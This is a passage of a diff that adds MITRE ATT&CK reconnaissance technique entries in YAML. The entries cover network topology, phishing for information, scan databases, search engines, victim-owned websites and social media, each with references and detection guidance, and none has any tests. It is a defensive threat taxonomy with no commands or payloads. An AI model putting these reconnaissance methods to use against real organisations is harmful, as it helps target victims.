+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:04:13.578Z'
+ created: '2020-10-02T16:01:35.350Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.004
+ url: https://attack.mitre.org/techniques/T1590/004
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Topology
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:04:40.188Z'
+ created: '2020-10-02T15:49:03.815Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.003
+ url: https://attack.mitre.org/techniques/T1590/003
+ - source_name: Pentesting AD Forests
+ url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
+ description: García, C. (2019, April 3). Pentesting Active Directory Forests.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Trust Dependencies
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:05:03.816Z'
+ created: '2020-10-02T15:47:59.457Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598
+ url: https://attack.mitre.org/techniques/T1598
+ - source_name: ThreatPost Social Media Phishing
+ url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
+ description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
+ Pad For Phishing Attacks. Retrieved October 20, 2020.'
+ - source_name: TrendMictro Phishing
+ url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
+ description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
+ October 20, 2020.
+ - source_name: PCMag FakeLogin
+ url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
+ description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations
+ Staffers With Fake Login Pages. Retrieved October 20, 2020.
+ - source_name: Sophos Attachment
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ - source_name: GitHub Phishery
+ url: https://github.com/ryhanson/phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Phishing for Information
+ description: |-
+ Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
+
+ All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
+
+ Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+ id: attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T19:44:58.292Z'
+ created: '2020-10-02T17:07:01.502Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Social media monitoring
+ - Mail server
+ - Email gateway
+ x_mitre_detection: |-
+ Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
+
+ When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
+
+ Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597.002
+ url: https://attack.mitre.org/techniques/T1597/002
+ - source_name: ZDNET Selling Data
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Purchase Technical Data
+ description: |-
+ Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
+
+ Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:26.840Z'
+ created: '2020-10-02T17:05:43.562Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.005
+ url: https://attack.mitre.org/techniques/T1596/005
+ - source_name: Shodan
+ url: https://shodan.io
+ description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scan Databases
+ description: |-
+ Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
+
+ Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:18.786Z'
+ created: '2020-10-02T17:00:44.586Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1595.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595.001
+ url: https://attack.mitre.org/techniques/T1595/001
+ - source_name: Botnet Scan
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scanning IP Blocks
+ description: |-
+ Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
+
+ Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:06:09.139Z'
+ created: '2020-10-02T16:54:23.193Z'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597
+ url: https://attack.mitre.org/techniques/T1597
+ - source_name: D3Secutrity CTI Feeds
+ url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
+ description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
+ Intelligence Feeds. Retrieved October 20, 2020.
+ - source_name: ZDNET Selling Data
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Closed Sources
+ description: |-
+ Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+
+ Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:53.892Z'
+ created: '2020-10-02T17:01:42.558Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593.002
+ url: https://attack.mitre.org/techniques/T1593/002
+ - source_name: SecurityTrails Google Hacking
+ url: https://securitytrails.com/blog/google-hacking-techniques
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved October 20, 2020.
+ - source_name: ExploitDB GoogleHacking
+ url: https://www.exploit-db.com/google-hacking-database
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Engines
+ description: |-
+ Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
+
+ Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:11.245Z'
+ created: '2020-10-02T16:50:12.809Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596
+ url: https://attack.mitre.org/techniques/T1596
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ - source_name: Medium SSL Cert
+ url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
+ description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
+ from Server (Site URL). Retrieved October 20, 2020.
+ - source_name: SSLShopper Lookup
+ url: https://www.sslshopper.com/ssl-checker.html
+ description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.
+ - source_name: DigitalShadows CDN
+ url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/
+ description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
+ Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
+ You Can Do About It. Retrieved October 20, 2020.
+ - source_name: Shodan
+ url: https://shodan.io
+ description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Open Technical Databases
+ description: |-
+ Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
+
+ Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:44.166Z'
+ created: '2020-10-02T16:56:05.810Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593
+ url: https://attack.mitre.org/techniques/T1593
+ - source_name: Cyware Social Media
+ url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
+ description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
+ Media To Break Into Your Company. Retrieved October 20, 2020.
+ - source_name: SecurityTrails Google Hacking
+ url: https://securitytrails.com/blog/google-hacking-techniques
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved October 20, 2020.
+ - source_name: ExploitDB GoogleHacking
+ url: https://www.exploit-db.com/google-hacking-database
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Open Websites/Domains
+ description: |-
+ Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
+
+ Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:46.374Z'
+ created: '2020-10-02T16:48:04.509Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1594:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1594
+ url: https://attack.mitre.org/techniques/T1594
+ - source_name: Comparitech Leak
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Search Victim-Owned Websites
+ description: |-
+ Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
+
+ Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:23:37.282Z'
+ created: '2020-10-02T16:51:50.306Z'
+ x_mitre_data_sources:
+ - Web logs
+ x_mitre_detection: Monitor for suspicious network traffic that could be indicative
+ of adversary reconnaissance, such as rapid successions of requests indicative
+ of web crawling and/or large quantities of requests originating from a single
+ source (especially if the source is known to be associated with an adversary).
+ Analyzing web metadata may also reveal artifacts that can be attributed to
+ potentially malicious activity, such as referer or user-agent string HTTP/S
+ fields.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1593.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1593.001
+ url: https://attack.mitre.org/techniques/T1593/001
+ - source_name: Cyware Social Media
+ url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
+ description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
+ Media To Break Into Your Company. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media
+ description: |-
+ Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
+
